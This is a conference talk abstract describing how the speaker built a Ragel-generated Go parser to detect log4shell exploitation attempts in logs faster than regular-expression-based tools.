Online / 5 & 6 February 2022


Detect Log4shell in No Time with Ragel and Go

I bet everyone heard of log4shell. I also hope everyone remembers the consequent rush to detect and fix it.

I've seen people to DDoS their systems using regular expressions to detect log4shell!

That's why I sat down to write a Go parser with Ragel that acts 20 times faster than other detection tools.

Join me to know how to do it yourself in the future.

In recent months, we've seen a plethora of supply chain attacks.

You all probably remember the log4j vulnerability - impacting literally half of the world's software - and the consequent rush to fix it.

A new way to cause the vulnerability was out, at any time of the day.

Fixing a widespread vulnerability like log4shell is almost impossible: it requires a lot of coordination and time. During such time windows, the attackers have continued compromising systems using log4shell techniques.

People started spending weekends building detection tools for understanding whether someone attempted log4shell compromising their systems or not.

Inspecting every network packet on the fly, or petabytes of logs afterward, by looking for lots of log4shell combinations has been unfeasible most of the time, given the crazy number of possible ways to carry out such attacks.

I've seen people to DDoS their systems using regular expressions to detect log4shell! Hilarious, isn't it?

For this reason, I built a blazingly fast parser using Go and Ragel.

Join me in this talk to learn everything about building finite-state machines 20x faster than RegEx, in Go with Ragel.

This talk is to give the spotlight they deserve to these two technologies working remarkably well together.


Photo of Leonardo Di Donato Leonardo Di Donato